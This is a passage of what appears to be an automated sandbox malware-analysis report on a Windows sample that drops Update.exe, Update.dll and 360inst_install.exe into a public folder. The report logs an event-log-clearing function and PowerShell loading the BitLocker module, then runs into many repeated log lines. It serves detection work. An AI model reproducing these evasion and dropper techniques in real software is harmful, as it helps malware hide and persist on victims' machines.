                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: 360inst_install.exe.lnk.3.drLNK file: ..\..\Public\Bilite\360inst_install.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: ErbgterT2R.exeStatic file information: File size 73541183 > 1048576
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2639809888.000000000785C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb77 source: powershell.exe, 00000012.00000002.2646019166.000000000899B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2641443881.000000000790F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp, Update.dll.0.dr
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2645678800.000000000896C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2646365604.00000000089D1000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360inst_install.exe.0.dr
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
                      Source: Update.dll.0.drStatic PE information: section name: .00cfg
                      Source: backup.dll.3.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00411C20 push eax; ret 0_2_00411C4E
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034F4345 push ecx; ret 3_2_034F4358
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0350A168 push eax; ret 3_2_0350A119
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0350A0B8 push eax; ret 3_2_0350A119
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03502450 push ebp; retf 3_2_03502474
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03502470 push ebp; retf 3_2_03502474
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C38CAF7 push ecx; ret 3_2_6C38CB0A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10009DF5 push ecx; ret 3_2_10009E08
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1001FE9A push ecx; ret 3_2_1001FEBF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0091CAFF push eax; retf 3_2_0091CB00
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0091CB07 pushad ; retf 3_2_0091CB08
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0091CB0B push 701000CBh; retf 3_2_0091CB10
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0091CB61 pushfd ; retf 3_2_0091CB64
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00919DCC push ecx; ret 3_2_00919DDF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03053D04 push ecx; ret 3_2_03053D17
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_04B6C040 push edi; iretd 18_2_04B6C046
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_04B6D293 push ebx; ret 18_2_04B6D2BA
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\backup.exeJump to dropped file
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile created: C:\Users\Public\Bilite\360inst_install.exeJump to dropped file
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile created: C:\Users\Public\Bilite\Axialis\Update.dllJump to dropped file
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeFile created: C:\Users\Public\Bilite\Axialis\Update.exeJump to dropped file
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EB3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_034EB3C0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
